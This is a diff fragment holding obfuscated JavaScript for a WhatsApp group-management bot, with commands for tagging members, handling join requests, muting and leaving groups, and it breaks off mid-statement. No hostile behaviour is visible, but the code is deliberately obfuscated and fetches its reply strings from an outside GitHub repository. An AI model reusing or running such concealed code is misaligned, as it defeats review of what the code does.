|
83 |
+
|
84 |
+
|
85 |
+
|
86 |
+
|
87 |
+
|
88 |
+
|
89 |
+
|
90 |
+
|
91 |
+
|
92 |
+
|
93 |
+
|
94 |
+
|
95 |
+
|
96 |
+
|
97 |
+
|
98 |
+
|
99 |
+
|
100 |
+
|
101 |
+
|
102 |
+
|
103 |
+
|
104 |
+
|
105 |
+
|
106 |
+
|
107 |
+
|
108 |
+
|
109 |
+
|
110 |
+
|
111 |
+
|
112 |
+
|
113 |
+
|
114 |
+
|
115 |
+
|
116 |
+
|
117 |
+
|
118 |
+
|
119 |
+
|
120 |
+
|
121 |
+
|
122 |
+
|
123 |
+
|
124 |
+
|
125 |
+
|
126 |
+
|
127 |
+
|
128 |
+
|
129 |
+
|
130 |
+
|
131 |
+
|
132 |
+
|
133 |
+
|
134 |
+
|
135 |
+
|
136 |
+
|
137 |
+
|
138 |
+
|
139 |
+
|
140 |
+
|
141 |
+
|
142 |
+
|
143 |
+
|
144 |
+
|
145 |
+
|
146 |
+
|
147 |
+
|
148 |
+
|
149 |
+
|
150 |
+
|
151 |
+
|
152 |
+
|
153 |
+
|
154 |
+
|
155 |
+
|
156 |
+
|
157 |
+
|
158 |
+
|
159 |
+
|
160 |
+
|
161 |
+
|
162 |
+
|
163 |
+
|
164 |
+
|
165 |
+
|
166 |
+
|
167 |
+
|
168 |
+
|
169 |
+
|
170 |
+
|
171 |
+
|
172 |
+
|
173 |
+
|
174 |
+
|
175 |
+
|
176 |
+
|
177 |
+
|
178 |
+
|
179 |
+
|
180 |
+
|
181 |
+
|
182 |
+
|
183 |
+
|
184 |
+
|
185 |
+
|
186 |
+
|
187 |
+
|
188 |
+
|
189 |
+
|
190 |
+
|
191 |
+
|
192 |
+
|
193 |
+
|
194 |
+
|
195 |
+
|
196 |
+
|
197 |
+
|
198 |
+
|
199 |
+
|
200 |
+
|
201 |
+
|
202 |
+
|
203 |
+
|
204 |
+
|
205 |
+
|
206 |
+
|
207 |
+
|
208 |
+
|
209 |
+
|
210 |
+
|
211 |
+
|
212 |
+
|
213 |
+
|
214 |
+
|
215 |
+
|
216 |
+
|
217 |
+
|
218 |
+
|
219 |
+
|
220 |
+
const _0x199e78=_0x3504;(function(_0x33a37a,_0x38d48c){const _0xd0fcaf=_0x3504,_0x526de1=_0x33a37a();while(!![]){try{const _0x17894b=parseInt(_0xd0fcaf(0x1a7))/0x1+-parseInt(_0xd0fcaf(0x11d))/0x2+parseInt(_0xd0fcaf(0x147))/0x3+-parseInt(_0xd0fcaf(0x170))/0x4+-parseInt(_0xd0fcaf(0x19b))/0x5+-parseInt(_0xd0fcaf(0x15c))/0x6*(parseInt(_0xd0fcaf(0x121))/0x7)+parseInt(_0xd0fcaf(0x196))/0x8;if(_0x17894b===_0x38d48c)break;else _0x526de1['push'](_0x526de1['shift']());}catch(_0x40e937){_0x526de1['push'](_0x526de1['shift']());}}}(_0x5584,0x49634));function hi(){const _0xbf16f0=_0x3504;console['log'](_0xbf16f0(0x15e));}hi();const config=require(_0x199e78(0x15b)),{cmd,commands}=require(_0x199e78(0x18b)),{getBuffer,getGroupAdmins,getRandom,h2k,isUrl,Json,runtime,sleep,fetchJson}=require(_0x199e78(0x169)),_0x235552={'pattern':_0x199e78(0x150),'desc':_0x199e78(0x14f),'react':'📋','category':_0x199e78(0x19e),'filename':__filename};cmd(_0x235552,async(_0x2ffb9f,_0x438ba1,_0x16ed81,{from:_0x43f645,q:_0x5c91ff,reply:_0x546ed9,isGroup:_0x1e625f})=>{const _0x372f0b=_0x199e78;if(!_0x1e625f)return _0x546ed9(_0x372f0b(0x1bb));try{console['log'](_0x372f0b(0x116)+_0x43f645);const _0x90c504=await _0x2ffb9f[_0x372f0b(0x127)](_0x43f645);console['log'](_0x90c504);if(_0x90c504['length']>0x0){let _0x764f9c=_0x372f0b(0x14d),_0x2dfcdb=[];_0x90c504[_0x372f0b(0x117)](_0x46be50=>{const _0x3d8a43=_0x372f0b,_0x5ac20b=_0x46be50[_0x3d8a43(0x19a)];_0x764f9c+=_0x3d8a43(0x118)+_0x5ac20b[_0x3d8a43(0x17c)]('@')[0x0]+'\x0a',_0x2dfcdb['push'](_0x5ac20b);});const _0x11536f={'text':_0x764f9c,'mentions':_0x2dfcdb};await _0x2ffb9f[_0x372f0b(0x129)](_0x43f645,_0x11536f);}else _0x546ed9(_0x372f0b(0x11c));}catch(_0x98ae0){console[_0x372f0b(0x1b9)](_0x372f0b(0x12a)+_0x98ae0[_0x372f0b(0x16c)]),_0x546ed9(_0x372f0b(0x1ba));}});const _0x485005={'pattern':_0x199e78(0x1ad),'desc':_0x199e78(0x1b8),'react':'✅','category':_0x199e78(0x19e),'filename':__filename};cmd(_0x485005,async(_0x1f5779,_0x3578f3,_0x134f92,{from:_0x391eb6,reply:_0x57ed51,isGroup:_0x589948})=>{const _0x5dec61=_0x199e78;if(!_0x589948)return _0x57ed51(_0x5dec61(0x1bb));const _0x1a4186=_0x134f92[_0x5dec61(0x154)][_0x5dec61(0x1a2)]('approve')?'approve':_0x5dec61(0x190);try{const _0x2f59ae=await _0x1f5779[_0x5dec61(0x127)](_0x391eb6);if(_0x2f59ae[_0x5dec61(0x119)]===0x0)return _0x57ed51(_0x5dec61(0x1be));let _0x19feb4='Pending\x20Requests\x20to\x20Join\x20the\x20Group:\x0a',_0x249424=[],_0x3642f2=[];_0x2f59ae[_0x5dec61(0x117)](_0x57342a=>{const _0x54f6af=_0x5dec61,_0x5adb4c=_0x57342a[_0x54f6af(0x19a)];_0x19feb4+='😻\x20@'+_0x5adb4c[_0x54f6af(0x17c)]('@')[0x0]+'\x0a',_0x249424[_0x54f6af(0x1bc)](_0x5adb4c),_0x3642f2['push'](_0x5adb4c);});const _0x335025={'text':_0x19feb4,'mentions':_0x249424};await _0x1f5779[_0x5dec61(0x129)](_0x391eb6,_0x335025);const _0x5a00ea=await _0x1f5779[_0x5dec61(0x192)](_0x391eb6,_0x3642f2,_0x1a4186);console['log'](_0x5a00ea),_0x57ed51(_0x5dec61(0x140)+_0x1a4186+_0x5dec61(0x159));}catch(_0x148714){console[_0x5dec61(0x1b9)](_0x5dec61(0x1af)+_0x148714[_0x5dec61(0x16c)]),_0x57ed51('⚠️\x20An\x20error\x20occurred\x20while\x20processing\x20the\x20request.\x20Please\x20try\x20again\x20later.');}});function _0x5584(){const _0x1f9420=['groupAcceptInvite','join','lockgs','Successfully\x20','kick','give_adm','mentionedJid','groupSettingUpdate','close','joinme','368451lkyvJn','main','participant','.updategname','.tag\x20Hi','glink','Pending\x20Requests\x20to\x20Join\x20the\x20Group:\x0a','To\x20Tag\x20all\x20Members\x20for\x20Message','Get\x20list\x20of\x20participants\x20who\x20requested\x20to\x20join\x20the\x20group','joinrequests','groupUpdateDescription','https://raw.githubusercontent.com/SILENTLOVER40/SILENT-SOBX-MD-DATA/refs/heads/main/DATABASE/mreply.json','.promote','body','gdesc','*Couldn\x27t\x20find\x20any\x20user\x20in\x20context*\x20❌','locked','*Please\x20write\x20the\x20new\x20Group\x20Subject*\x20🖊️','ed\x20all\x20join\x20requests.','.kick','../config','16572rUPMuF','remove','Hello\x20World!','ginfo','*\x20🔇','subject','🖇️','unlockgs','Invalid\x20duration!\x20Use\x20`24h`,\x20`7d`,\x20or\x20`90d`.','To\x20Join\x20a\x20Group\x20from\x20Invite\x20link','taggp','upgname','.join\x20<\x20Group\x20Link\x20>','../lib/functions','.mute','hidetag','message','f_revoke','This\x20command\x20can\x20only\x20be\x20used\x20in\x20groups.','Please\x20provide\x20a\x20message\x20to\x20send.','158680FqjMCF','revokelink','tagall','To\x20leave\x20from\x20the\x20group','.unmute','.demote','image','updategdesc','Change\x20to\x20group\x20settings\x20to\x20only\x20admins\x20can\x20send\x20messages\x20&\x20Mr\x20Frank.','groupParticipantsUpdate','desc','unlockgsettings','split','Please\x20use\x20`!disappear\x20on\x20<duration>`\x20or\x20`!disappear\x20off`.','❗\x20*User\x20Already\x20an\x20Admin*\x20\x20✔️','To\x20Remove\x20a\x20participant\x20from\x20Group','*At\x20Last,\x20Group\x20Chat\x20Opened\x20by\x20Admin\x20','groupRevokeInvite','gname','promote','*Please\x20add\x20a\x20Message*\x20ℹ️','Turn\x20on/off\x20disappearing\x20messages.','mute','*Please\x20mention\x20a\x20message*\x20ℹ️','contextInfo','Change\x20to\x20group\x20settings\x20to\x20all\x20members\x20can\x20edit\x20group\x20info','*Group\x20link\x20Reseted*\x20⛔','../command','own_cmd','groupinfo','invite','*Please\x20write\x20the\x20Group\x20Link*️\x20🖇️','reject','.invite','groupRequestParticipantsUpdate','revoke','*Successfully\x20removed*\x20\x20✔️','\x0a\x0a📃\x20*Group\x20Description*\x20-\x20','3194304EregDG','\x0a\x0a📬\x20*Participant\x20Count*\x20-\x20','.revoke','announcement','jid','2008815uINhCN','To\x20Tag\x20all\x20Members','🖇️\x20*Group\x20Link*\x0a\x0ahttps://chat.whatsapp.com/','group','you_adm','.leave','disappear','includes','size','FOOTER','.updategdesc','senddm','522707QdVFtW','demote','key','❌\x20*Error\x20Accurated\x20!!*\x0a\x0a','I\x20have\x20rested\x20Enough,\x20Changed\x20\x20group\x20settings\x20to\x20all\x20members\x20can\x20send\x20messages.','>\x20ᴅᴇᴀʀ\x20☣️\x20@','allreq','Change\x20to\x20group\x20settings\x20to\x20only\x20admins\x20can\x20edit\x20group\x20info','Error\x20updating\x20participant\x20requests:\x20','senddisappear','💱\x20*HI\x20ALL\x20!\x20GIVE\x20YOUR\x20ATTENTION\x20PLEASE*\x20\x0a\x20\x0a','.lockgs','lockgsettings','f_taggp','To\x20Change\x20the\x20group\x20description','❗\x20*User\x20Already\x20not\x20an\x20Admin*','owner','Approve\x20or\x20reject\x20all\x20join\x20requests','error','⚠️\x20An\x20error\x20occurred\x20while\x20fetching\x20the\x20pending\x20requests.\x20Please\x20try\x20again\x20later.','This\x20command\x20can\x20only\x20be\x20used\x20in\x20a\x20group\x20chat.','push','*Please\x20write\x20the\x20new\x20Group\x20Description*\x20🖊️','There\x20are\x20no\x20pending\x20requests\x20to\x20manage.','f_join','unlocked','replyMsg','*Please\x20add\x20a\x20Group\x20Jid*\x20ℹ️','msg','24h','*Group\x20settings\x20Locked*\x20🔒','Send\x20a\x20disappearing\x20message.','90d','✔️\x20*Successfully\x20Joined*','\x0a\x0a👤\x20*Group\x20Creator*\x20-\x20','f_mute','quoted','Attempting\x20to\x20fetch\x20pending\x20requests\x20for\x20group:\x20','forEach','😻\x20@','length','kickme','.tagall','No\x20pending\x20requests\x20to\x20join\x20the\x20group.','600042TzhOOm','leave','*Yooh\x20Guys\x20Iam\x20Tired\x20😓,\x20Its\x20Time\x20to\x20rest,\x20Group\x20Chat\x20closed\x20by\x20Admin\x20','*User\x20No\x20longer\x20an\x20Admin*\x20\x20✔️','7XseBeF','f_left','https://chat.whatsapp.com/','.ginfo','f-left','f_leave','groupRequestParticipantsList','*Group\x20settings\x20Unlocked*\x20🔓','sendMessage','Error\x20fetching\x20participant\x20requests:\x20','addadmin','grouplink','profilePictureUrl','upgdesc','map','log','only_gp','removeadmin','open','groupLeave','groupInviteCode','Disappearing\x20messages\x20are\x20now\x20ON\x20for\x20','*\x0a\x0a🐉\x20*Group\x20Jid*\x20-\x20','tag','🌪️','left','To\x20Add\x20a\x20participatant\x20as\x20a\x20Admin','Get\x20group\x20informations.'];_0x5584=function(){return _0x1f9420;};return _0x5584();}const _0x3bcce0={'pattern':_0x199e78(0x1a1),'react':'🌪️','alias':['dm'],'desc':_0x199e78(0x185),'category':_0x199e78(0x148),'filename':__filename};cmd(_0x3bcce0,async(_0x13d32c,_0xf2a7e7,_0xfa9725,{from:_0x2dec3d,isGroup:_0x12c2ce,isAdmins:_0x1ad1ee,args:_0x5300c9})=>{const _0x101cf4=_0x199e78;if(!_0x12c2ce){const _0x21e358={'text':'This\x20command\x20can\x20only\x20be\x20used\x20in\x20groups.'};await _0x13d32c[_0x101cf4(0x129)](_0x2dec3d,_0x21e358);return;}if(!_0x1ad1ee){const _0x43010d={'text':'Only\x20admins\x20can\x20turn\x20on/off\x20disappearing\x20messages.'};await _0x13d32c[_0x101cf4(0x129)](_0x2dec3d,_0x43010d);return;}const _0x36fa3d=_0x5300c9[0x0];if(_0x36fa3d==='on'){const _0x9ad93f=_0x5300c9[0x1];let _0x1f4baa;switch(_0x9ad93f){case _0x101cf4(0x1c4):_0x1f4baa=0x15180;break;case'7d':_0x1f4baa=0x93a80;break;case _0x101cf4(0x111):_0x1f4baa=0x76a700;break;default:const _0x443fd1={'text':_0x101cf4(0x164)};await _0x13d32c['sendMessage'](_0x2dec3d,_0x443fd1);return;}const _0x2797d8={'disappearingMessagesInChat':_0x1f4baa};await _0x13d32c[_0x101cf4(0x129)](_0x2dec3d,_0x2797d8);const _0x5c0723={'text':_0x101cf4(0x136)+_0x9ad93f+'.'};await _0x13d32c[_0x101cf4(0x129)](_0x2dec3d,_0x5c0723);}else{if(_0x36fa3d==='off'){const _0x4f6ea6={'disappearingMessagesInChat':![]};await _0x13d32c[_0x101cf4(0x129)](_0x2dec3d,_0x4f6ea6);const _0x4e3ecb={'text':'Disappearing\x20messages\x20are\x20now\x20OFF.'};await _0x13d32c[_0x101cf4(0x129)](_0x2dec3d,_0x4e3ecb);}else{const _0x4d7e53={'text':_0x101cf4(0x17d)};await _0x13d32c[_0x101cf4(0x129)](_0x2dec3d,_0x4d7e53);}}});const _0x592aaf={'pattern':_0x199e78(0x1a6),'react':_0x199e78(0x139),'alias':[_0x199e78(0x1b0)],'desc':_0x199e78(0x110),'category':_0x199e78(0x148),'filename':__filename};cmd(_0x592aaf,async(_0x3613d6,_0x2a02bf,_0x49f797,{from:_0x2be862,isGroup:_0x4b7a27,isAdmins:_0x37f01b,args:_0x330c1a})=>{const _0x3761b6=_0x199e78;if(!_0x4b7a27){const _0x257f73={'text':_0x3761b6(0x16e)};await _0x3613d6[_0x3761b6(0x129)](_0x2be862,_0x257f73);return;}if(!_0x330c1a[_0x3761b6(0x119)]){const _0x583899={'text':_0x3761b6(0x16f)};await _0x3613d6[_0x3761b6(0x129)](_0x2be862,_0x583899);return;}const _0x38ac81=_0x330c1a[_0x3761b6(0x13e)]('\x20'),_0x417d5a={'text':_0x38ac81},_0x216298={'ephemeralExpiration':0x93a80};await _0x3613d6['sendMessage'](_0x2be862,_0x417d5a,_0x216298);});const _0x4f6b5b={'pattern':_0x199e78(0x186),'react':'🔇','alias':[_0x199e78(0x145),_0x199e78(0x114)],'desc':_0x199e78(0x178),'category':'group','use':_0x199e78(0x16a),'filename':__filename};cmd(_0x4f6b5b,async(_0x3b3a20,_0x4bed3e,_0x111bd8,{from:_0x45abd4,l:_0x31685f,quoted:_0x499aa7,body:_0x2f4b33,isCmd:_0x1b125c,command:_0x372556,args:_0x4ad073,q:_0x38ed93,isGroup:_0x534a06,sender:_0x108c6f,senderNumber:_0x58c2e7,botNumber2:_0x34d5d7,botNumber:_0x2b7c88,pushname:_0x565fa4,isMe:_0x36d6f2,isOwner:_0x314c90,groupMetadata:_0x323c4f,groupName:_0xb9d00a,participants:_0x2540e5,groupAdmins:_0x48b5c2,isBotAdmins:_0x28335e,isCreator:_0xa06666,isDev:_0x5a4a9c,isAdmins:_0x53a83f,reply:_0xd70645})=>{const _0x50fe21=_0x199e78;try{const _0x5ab171=(await fetchJson('https://raw.githubusercontent.com/SILENTLOVER40/SILENT-SOBX-MD-DATA/refs/heads/main/DATABASE/mreply.json'))[_0x50fe21(0x1c1)];if(!_0x534a06)return _0xd70645(_0x5ab171[_0x50fe21(0x131)]);if(!_0x53a83f){const _0x5c4a9d={'quoted':_0x4bed3e};if(!_0x5a4a9c)return _0xd70645(_0x5ab171[_0x50fe21(0x19f)]),_0x5c4a9d;}if(!_0x28335e)return _0xd70645(_0x5ab171[_0x50fe21(0x142)]);await _0x3b3a20['groupSettingUpdate'](_0x45abd4,_0x50fe21(0x199));const _0x13c306={'text':_0x50fe21(0x11f)+_0x565fa4+_0x50fe21(0x160)},_0xd9ffbb={'quoted':_0x4bed3e};await _0x3b3a20[_0x50fe21(0x129)](_0x45abd4,_0x13c306,_0xd9ffbb);}catch(_0x399fee){const _0x5698a2={'text':'❌','key':_0x4bed3e[_0x50fe21(0x1a9)]},_0x579225={'react':_0x5698a2};await _0x3b3a20[_0x50fe21(0x129)](_0x45abd4,_0x579225),console['log'](_0x399fee),_0xd70645(_0x50fe21(0x1aa)+_0x399fee);}});const _0x87e572={'pattern':'unmute','react':'🔇','alias':[_0x199e78(0x133),'f_unmute'],'desc':_0x199e78(0x1ab),'category':'group','use':_0x199e78(0x174),'filename':__filename};cmd(_0x87e572,async(_0xd69e8c,_0x147af3,_0x13ae77,{from:_0x4692d4,l:_0x1d73aa,quoted:_0x235127,body:_0x5951ee,isCmd:_0x578788,command:_0x4f8c6e,args:_0x266fec,q:_0x2dd379,isGroup:_0x1bb284,sender:_0x724d7d,senderNumber:_0x497703,botNumber2:_0x17ffaf,botNumber:_0x4fe944,pushname:_0x1f27d2,isMe:_0x30698a,isOwner:_0x581da7,groupMetadata:_0x295bd2,groupName:_0x245abb,participants:_0x232147,groupAdmins:_0x28ad64,isBotAdmins:_0xfcea3f,isCreator:_0x21d40f,isDev:_0x35127a,isAdmins:_0x46076e,reply:_0x54c87a})=>{const _0x332fcc=_0x199e78;try{const _0x2ae8e4=(await fetchJson(_0x332fcc(0x152)))[_0x332fcc(0x1c1)];if(!_0x1bb284)return _0x54c87a(_0x2ae8e4[_0x332fcc(0x131)]);if(!_0x46076e){const _0x417851={'quoted':_0x147af3};if(!_0x35127a)return _0x54c87a(_0x2ae8e4['you_adm']),_0x417851;}if(!_0xfcea3f)return _0x54c87a(_0x2ae8e4[_0x332fcc(0x142)]);await _0xd69e8c[_0x332fcc(0x144)](_0x4692d4,'not_announcement');const _0x545eef={'text':_0x332fcc(0x180)+_0x1f27d2+_0x332fcc(0x160)},_0xedab56={'quoted':_0x147af3};await _0xd69e8c[_0x332fcc(0x129)](_0x4692d4,_0x545eef,_0xedab56);}catch(_0x341a2f){const _0x5cacc8={'text':'❌','key':_0x147af3['key']},_0x50640a={'react':_0x5cacc8};await _0xd69e8c[_0x332fcc(0x129)](_0x4692d4,_0x50640a),console[_0x332fcc(0x130)](_0x341a2f),_0x54c87a(_0x332fcc(0x1aa)+_0x341a2f);}});const _0x2bff43={'pattern':_0x199e78(0x13f),'react':'🔇','alias':[_0x199e78(0x1b3)],'desc':_0x199e78(0x1ae),'category':_0x199e78(0x19e),'use':_0x199e78(0x1b2),'filename':__filename};cmd(_0x2bff43,async(_0x2c0ab6,_0xdc8556,_0x4cd79a,{from:_0x3ff809,l:_0x593c2f,quoted:_0x9f5ec4,body:_0x4e6549,isCmd:_0x1e94be,command:_0x1e4296,args:_0xd52ce2,q:_0x12f283,isGroup:_0x51cdbe,sender:_0x8c043a,senderNumber:_0x7fd566,botNumber2:_0x4c551c,botNumber:_0x493cc3,pushname:_0x23da3a,isMe:_0x221316,isOwner:_0xe53113,groupMetadata:_0x36ba1d,groupName:_0x2b01b,participants:_0xfa60ad,groupAdmins:_0x2bd159,isBotAdmins:_0x4748bf,isCreator:_0x5d53f1,isDev:_0x215804,isAdmins:_0x471e0e,reply:_0x50f459})=>{const _0x3ae42a=_0x199e78;try{const _0x1ddffe=(await fetchJson(_0x3ae42a(0x152)))['replyMsg'];if(!_0x51cdbe)return _0x50f459(_0x1ddffe[_0x3ae42a(0x131)]);if(!_0x471e0e){const _0x3a926d={'quoted':_0xdc8556};if(!_0x215804)return _0x50f459(_0x1ddffe['you_adm']),_0x3a926d;}if(!_0x4748bf)return _0x50f459(_0x1ddffe['give_adm']);await _0x2c0ab6[_0x3ae42a(0x144)](_0x3ff809,_0x3ae42a(0x157));const _0x46cb3d={'text':_0x3ae42a(0x1c5)},_0x29a78c={'quoted':_0xdc8556};await _0x2c0ab6[_0x3ae42a(0x129)](_0x3ff809,_0x46cb3d,_0x29a78c);}catch(_0x562965){const _0x5803b8={'text':'❌','key':_0xdc8556[_0x3ae42a(0x1a9)]},_0xa6c98f={'react':_0x5803b8};await _0x2c0ab6[_0x3ae42a(0x129)](_0x3ff809,_0xa6c98f),console['log'](_0x562965),_0x50f459('❌\x20*Error\x20Accurated\x20!!*\x0a\x0a'+_0x562965);}});function _0x3504(_0x4cdc47,_0x5e253e){const _0x5584ab=_0x5584();return _0x3504=function(_0x350401,_0x165a23){_0x350401=_0x350401-0x110;let _0x3c1feb=_0x5584ab[_0x350401];return _0x3c1feb;},_0x3504(_0x4cdc47,_0x5e253e);}const _0x285abb={'pattern':_0x199e78(0x163),'react':'🔓','alias':[_0x199e78(0x17b)],'desc':_0x199e78(0x189),'category':_0x199e78(0x19e),'use':'.unlockgs','filename':__filename};cmd(_0x285abb,async(_0x3455b4,_0x74c17a,_0x11860d,{from:_0x2b040b,l:_0x197418,quoted:_0xe43730,body:_0x71d92b,isCmd:_0x32ed0b,command:_0x5e4ee8,args:_0x52c7ca,q:_0x352ed8,isGroup:_0x1b10a5,sender:_0x3e8b33,senderNumber:_0x3c3e44,botNumber2:_0x2c0fdb,botNumber:_0x10b4f0,pushname:_0x1a3d33,isMe:_0x39e012,isOwner:_0x577f24,groupMetadata:_0x3f0367,groupName:_0x99339,participants:_0x5814b9,groupAdmins:_0x5c03f5,isBotAdmins:_0x42bb61,isCreator:_0x4c7925,isDev:_0x23e68c,isAdmins:_0x37ef67,reply:_0x22eb4a})=>{const _0x5923b2=_0x199e78;try{const _0x2c66f0=(await fetchJson(_0x5923b2(0x152)))['replyMsg'];if(!_0x1b10a5)return _0x22eb4a(_0x2c66f0[_0x5923b2(0x131)]);if(!_0x37ef67){const _0x205a46={'quoted':_0x74c17a};if(!_0x23e68c)return _0x22eb4a(_0x2c66f0[_0x5923b2(0x19f)]),_0x205a46;}if(!_0x42bb61)return _0x22eb4a(_0x2c66f0['give_adm']);await _0x3455b4['groupSettingUpdate'](_0x2b040b,_0x5923b2(0x1c0));const _0x63e0f9={'text':_0x5923b2(0x128)},_0x3e0a2c={'quoted':_0x74c17a};await _0x3455b4[_0x5923b2(0x129)](_0x2b040b,_0x63e0f9,_0x3e0a2c);}catch(_0x4a8c07){const _0x86b3ec={'text':'❌','key':_0x74c17a[_0x5923b2(0x1a9)]},_0x5ab26a={'react':_0x86b3ec};await _0x3455b4[_0x5923b2(0x129)](_0x2b040b,_0x5ab26a),console[_0x5923b2(0x130)](_0x4a8c07),_0x22eb4a(_0x5923b2(0x1aa)+_0x4a8c07);}});const _0x2ad4fd={'pattern':_0x199e78(0x11e),'react':'🔓','alias':[_0x199e78(0x13a),_0x199e78(0x11a),_0x199e78(0x126),_0x199e78(0x122),_0x199e78(0x125)],'desc':_0x199e78(0x173),'category':_0x199e78(0x19e),'use':_0x199e78(0x1a0),'filename':__filename};cmd(_0x2ad4fd,async(_0x487151,_0x47d082,_0x29f5ea,{from:_0x3a1f47,l:_0x1be498,quoted:_0x557cd4,body:_0x370583,isCmd:_0x37354f,command:_0x2fd313,args:_0x312c5f,q:_0x18e824,isGroup:_0x1095b7,sender:_0x2e3ed5,senderNumber:_0x115753,botNumber2:_0x227d25,botNumber:_0x4182c2,pushname:_0x280c65,isMe:_0x474a3a,isOwner:_0x20c68a,groupMetadata:_0x55ceed,groupName:_0x1f91d6,participants:_0x9dce24,groupAdmins:_0x13b5de,isBotAdmins:_0x471e94,isCreator:_0x10761c,isDev:_0x15971b,isAdmins:_0x3b193c,reply:_0x5d4c20})=>{const _0xecab88=_0x199e78;try{const _0x345e97=(await fetchJson(_0xecab88(0x152)))[_0xecab88(0x1c1)];if(!_0x1095b7)return _0x5d4c20(_0x345e97[_0xecab88(0x131)]);if(!_0x3b193c){if(!_0x15971b)return _0x5d4c20(_0x345e97[_0xecab88(0x19f)]);}const _0x27ea65={'text':'*Good\x20Bye\x20All*\x20👋🏻'},_0x31d4ca={'quoted':_0x47d082};await _0x487151[_0xecab88(0x129)](_0x3a1f47,_0x27ea65,_0x31d4ca),await _0x487151[_0xecab88(0x134)](_0x3a1f47);}catch(_0x131083){const _0x4882cc={'text':'❌','key':_0x47d082[_0xecab88(0x1a9)]},_0x922cf4={'react':_0x4882cc};await _0x487151[_0xecab88(0x129)](_0x3a1f47,_0x922cf4),console[_0xecab88(0x130)](_0x131083),_0x5d4c20(_0xecab88(0x1aa)+_0x131083);}});const _0x293215={'pattern':'updategname','react':'🔓','alias':[_0x199e78(0x167),_0x199e78(0x182)],'desc':'To\x20Change\x20the\x20group\x20name','category':_0x199e78(0x19e),'use':_0x199e78(0x14a),'filename':__filename};cmd(_0x293215,async(_0x11a7d8,_0x236b80,_0x37dbb2,{from:_0x485674,l:_0xfbdc5e,quoted:_0x2d3af2,body:_0x3a412d,isCmd:_0x3412a,command:_0x3a7e4e,args:_0x28b9d1,q:_0x7e8251,isGroup:_0x23ea90,sender:_0x4166be,senderNumber:_0x4126a5,botNumber2:_0x1b0052,botNumber:_0x39d893,pushname:_0xe51687,isMe:_0x3c8bde,isOwner:_0x156dca,groupMetadata:_0x4c8822,groupName:_0x57d01f,participants:_0x4fb3d8,groupAdmins:_0x1bfb4a,isBotAdmins:_0x3d1b4c,isCreator:_0x385068,isDev:_0x44988c,isAdmins:_0x91462f,reply:_0x4f803f})=>{const _0x57ce6f=_0x199e78;try{const _0x143dc5=(await fetchJson('https://raw.githubusercontent.com/SILENTLOVER40/SILENT-SOBX-MD-DATA/refs/heads/main/DATABASE/mreply.json'))[_0x57ce6f(0x1c1)];if(!_0x23ea90)return _0x4f803f(_0x143dc5[_0x57ce6f(0x131)]);if(!_0x91462f){const _0x1dcd19={'quoted':_0x236b80};if(!_0x44988c)return _0x4f803f(_0x143dc5[_0x57ce6f(0x19f)]),_0x1dcd19;}if(!_0x3d1b4c)return _0x4f803f(_0x143dc5[_0x57ce6f(0x142)]);if(!_0x7e8251)return _0x4f803f(_0x57ce6f(0x158));await _0x11a7d8['groupUpdateSubject'](_0x485674,_0x7e8251);const _0x3714a2={'text':'✔️\x20*Group\x20name\x20Updated*'},_0xec4da1={'quoted':_0x236b80};await _0x11a7d8[_0x57ce6f(0x129)](_0x485674,_0x3714a2,_0xec4da1);}catch(_0x4486ad){const _0x59e0d7={'text':'❌','key':_0x236b80[_0x57ce6f(0x1a9)]},_0x3aeac5={'react':_0x59e0d7};await _0x11a7d8['sendMessage'](_0x485674,_0x3aeac5),console[_0x57ce6f(0x130)](_0x4486ad),_0x4f803f(_0x57ce6f(0x1aa)+_0x4486ad);}});const _0x19cdd8={'pattern':_0x199e78(0x177),'react':'🔓','alias':[_0x199e78(0x12e),_0x199e78(0x155)],'desc':_0x199e78(0x1b5),'category':_0x199e78(0x19e),'use':_0x199e78(0x1a5),'filename':__filename};cmd(_0x19cdd8,async(_0x35f991,_0x579cb3,_0x193e18,{from:_0x17c640,l:_0x239d8c,quoted:_0x5a9619,body:_0x5528e8,isCmd:_0x186b08,command:_0x5d2f76,args:_0x11f058,q:_0x4a7e43,isGroup:_0x1081a3,sender:_0x4b17eb,senderNumber:_0x56f94b,botNumber2:_0x594d2f,botNumber:_0x326990,pushname:_0x3453b1,isMe:_0x38ff98,isOwner:_0x39c9f3,groupMetadata:_0x24c169,groupName:_0x17d16d,participants:_0x107100,groupAdmins:_0x2bbd7,isBotAdmins:_0x5297bf,isCreator:_0x4cc7e8,isDev:_0x40a309,isAdmins:_0x4a462e,reply:_0x272750})=>{const _0x165017=_0x199e78;try{const _0x19ef23=(await fetchJson('https://raw.githubusercontent.com/SILENTLOVER40/SILENT-SOBX-MD-DATA/refs/heads/main/DATABASE/mreply.json'))[_0x165017(0x1c1)];if(!_0x1081a3)return _0x272750(_0x19ef23[_0x165017(0x131)]);if(!_0x4a462e){const _0xd9fc9e={'quoted':_0x579cb3};if(!_0x40a309)return _0x272750(_0x19ef23[_0x165017(0x19f)]),_0xd9fc9e;}if(!_0x5297bf)return _0x272750(_0x19ef23[_0x165017(0x142)]);if(!_0x4a7e43)return _0x272750(_0x165017(0x1bd));await _0x35f991[_0x165017(0x151)](_0x17c640,_0x4a7e43);const _0x2a2d71={'text':'✔️\x20*Group\x20Description\x20Updated*'},_0x520f9d={'quoted':_0x579cb3};await _0x35f991['sendMessage'](_0x17c640,_0x2a2d71,_0x520f9d);}catch(_0x35f16a){const _0x4d4dc6={'text':'❌','key':_0x579cb3[_0x165017(0x1a9)]},_0x2ef1e8={'react':_0x4d4dc6};await _0x35f991['sendMessage'](_0x17c640,_0x2ef1e8),console[_0x165017(0x130)](_0x35f16a),_0x272750(_0x165017(0x1aa)+_0x35f16a);}});const _0x53f490={'pattern':_0x199e78(0x13e),'react':'📬','alias':[_0x199e78(0x146),_0x199e78(0x1bf)],'desc':_0x199e78(0x165),'category':_0x199e78(0x19e),'use':_0x199e78(0x168),'filename':__filename};cmd(_0x53f490,async(_0x427334,_0xe84103,_0x2e029d,{from:_0x3c676f,l:_0xcef56b,quoted:_0xf63d1a,body:_0x3d89e4,isCmd:_0x3fac01,command:_0x156ae7,args:_0x13a44f,q:_0x454353,isGroup:_0x1ccdab,sender:_0x21bf4a,senderNumber:_0x5a52b6,botNumber2:_0x51bd73,botNumber:_0x36967d,pushname:_0x5793ed,isMe:_0x590522,isOwner:_0x20e786,groupMetadata:_0xf2f414,groupName:_0x18cde9,participants:_0x47f8e0,groupAdmins:_0x5d38f9,isBotAdmins:_0x1ac14e,isCreator:_0x3e1721,isDev:_0x521974,isAdmins:_0x144b1f,reply:_0x2a3e11})=>{const _0x72ce3d=_0x199e78;try{const _0x410294=(await 